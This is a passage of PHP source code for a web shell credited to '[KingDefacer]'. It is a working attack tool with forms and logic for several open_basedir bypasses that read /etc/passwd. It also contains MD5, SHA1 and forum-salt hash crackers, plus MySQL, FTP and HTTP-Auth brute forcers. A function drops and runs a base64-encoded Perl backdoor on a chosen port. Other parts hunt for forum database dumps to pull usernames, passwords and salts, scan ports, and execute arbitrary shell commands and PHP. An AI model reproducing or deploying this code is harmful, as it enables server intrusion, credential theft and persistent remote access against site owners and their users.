echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>
|
|
<tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>
|
|
<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>
|
|
<tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>
|
|
<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>
|
|
<tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>
|
|
<tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>
|
|
</table>";
|
|
}
|
|
function brute_force()
|
|
{
|
|
echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr>
|
|
<tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr>
|
|
<tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr>
|
|
<tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr>
|
|
<tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr>
|
|
<tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr>
|
|
<tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr>
|
|
<tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr>
|
|
<tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr>
|
|
<tr><td colspan='2'>Wordlist</td></tr>
|
|
<tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr>
|
|
</br></table></form>";
|
|
}
|
|
function BackDoor()
|
|
{
|
|
global $backdoor_perl;
|
|
global $disable;
|
|
if(!isset($_POST['backdoor_host']))
|
|
{
|
|
echo "<center><form action='$self?act=bh' method='post'>
|
|
Port: <input type='text' name='port'>
|
|
<input type='submit' name='backdoor_host' value='Backdoor'></center>";
|
|
} else {
|
|
@$fh=fopen("shbd.pl","w");
|
|
@fwrite($fh,base64_decode($backdoor_perl));
|
|
@fclose($fh);
|
|
execmd("perl shbd.pl $_POST[port]",$disable);
|
|
echo "Server backdoor'd</br>";
|
|
}
|
|
}
|
|
function sql_rep_search($dir)
|
|
{
|
|
global $self;
|
|
$ext=array(".db",".sql");
|
|
@$dh=opendir($dir);
|
|
while((@$file=readdir($dh)))
|
|
{
|
|
$ex=strrchr($file,'.');
|
|
if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db")
|
|
echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>";
|
|
if(is_dir($dir.$file)&&$file!='..'&&$file!='.')
|
|
{
|
|
if(!preg_match("/\/public_html\//",$dir))
|
|
sql_rep_search($dir.$file.'/public_html/');
|
|
else
|
|
sql_rep_search($dir.$file);
|
|
}
|
|
}
|
|
@closedir($dh);
|
|
}
|
|
function database_tools()
|
|
{
|
|
if(isset($_POST['sql_start_search']))
|
|
{
|
|
echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>";
|
|
sql_rep_search("/home/");
|
|
echo "</table></center>";
|
|
}
|
|
$colarr=array();
|
|
if(isset($_POST['db_parse']))
|
|
{
|
|
if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse...");
|
|
$db_meth=empty($_POST['db_dpath'])?'uploaded':'path';
|
|
$q_delimit=$_POST['q_delimit'];
|
|
if(isset($_POST['column_defined']))
|
|
{
|
|
switch($_POST['column_type'])
|
|
{
|
|
case 'SMF':
|
|
break;
|
|
case 'phpbb':
|
|
break;
|
|
case 'vbulletin':
|
|
$colarr=array(4,5,7,48);
|
|
break;
|
|
}
|
|
} else {
|
|
$strr=str_replace(", ",",",trim($_POST['db_columns']));
|
|
$colarr=explode(",",$strr);
|
|
}
|
|
switch($db_meth)
|
|
{
|
|
case 'uploaded':
|
|
@$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading");
|
|
break;
|
|
case 'path':
|
|
@$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading");
|
|
break;
|
|
}
|
|
echo "Parsing database contents...</br>";
|
|
while(!feof($fh))
|
|
{
|
|
$c_line=fgets($fh);
|
|
$strr=str_replace(", ",",",$c_line);
|
|
$arr=explode(',',$strr);
|
|
for($i=0;$i<count($colarr);$i++)
|
|
{
|
|
$index=$colarr[$i];
|
|
if(empty($arr[$index])) continue;
|
|
$spos=strpos("$_POST[q_delimit]",$arr[$index]);
|
|
$spos=strpos("$_POST[q_delimit]",$arr[$index],$spos);
|
|
if($i!==count($colarr)-1)
|
|
echo "$arr[$index] : ";
|
|
else echo "$arr[$index]</br>";
|
|
}
|
|
continue;
|
|
}
|
|
@fclose($fh);
|
|
}
|
|
echo "<table style='width: 100%; margin: auto; text-align: center'>
|
|
<tr><td colspan='2'>Database parser</td></tr>
|
|
<tr><td>
|
|
<form action='$self?act=dbs' method='post' enctype='multipart/form-data'>
|
|
Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br>
|
|
Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'>
|
|
<option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option>
|
|
</select></br>
|
|
Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'>
|
|
</br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'>
|
|
</br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr>
|
|
<tr><td colspan='2'>Find database Backups</td></tr>
|
|
<tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr>
|
|
</table>";
|
|
}
|
|
function show_tools()
|
|
{
|
|
echo "<form action='$self' method='post'>
|
|
<table style='width: 100%; margin: auto; text-align: center'>
|
|
<tr><td colspan='2'>Tools</td></tr>
|
|
<tr><td>Forum locator</td><td>Config locator</td></tr>
|
|
<tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr>
|
|
<tr><td>Port scanner</td><td>Search</td></tr>
|
|
<tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr>
|
|
</table>";
|
|
}
|
|
function TrueSize($s)
|
|
{
|
|
if(!$s) return 0;
|
|
if($s>=1073741824) return(round($s/1073741824)." GB");
|
|
elseif($s>=1048576) return(round($s/1048576)." MB");
|
|
elseif($s>=1024) return(round($s/1024)." KB");
|
|
else return($s." B");
|
|
}
|
|
function CleanDir($d)
|
|
{
|
|
$d=str_replace("\\","/",$d);
|
|
$d=str_replace("//","/",$d);
|
|
return $d;
|
|
}
|
|
function Trail($d)
|
|
{
|
|
$d=explode('/',$d);
|
|
array_pop($d);
|
|
array_pop($d);
|
|
$str=implode($d,'/');
|
|
return $str;
|
|
}
|
|
function Encoder()
|
|
{
|
|
echo "<form action='$self?' method='post'>
|
|
<center>
|
|
Input: <input type='text' style='width: 300px' name='encrypt'>
|
|
<br><input type='submit' value='Encrypt' name='encryption'>
|
|
</center>
|
|
</form>";
|
|
}
|
|
$relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd()));
|
|
if(isset($_GET['d'])) $self.="?d=$_GET[d]";
|
|
echo "<table style='text-align: center; width: 100%'>
|
|
<tr><td colspan='2'>Execute command</td></tr>
|
|
<tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr>
|
|
<tr><td colspan='2'>Execute PHP</td></tr>
|
|
<tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr>
|
|
<tr><td>Create directory</td><td>Create file</td></tr>
|
|
<tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr>
|
|
<tr><td>Enter directory</td><td>Edit file</td></tr>
|
|
<tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr>
|
|
<tr><td>Upload file</td><td>Wget file</td></tr>
|
|
<tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr>
|
|
<tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr>
|
|
</table>
|
|
</br></br><div id='bar'><center>Shell [version 2.0] Edited By <font color='red'><b>[KingDefacer]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font></center></div></body></html>";
|
|
ob_end_flush();
|
|
?>
|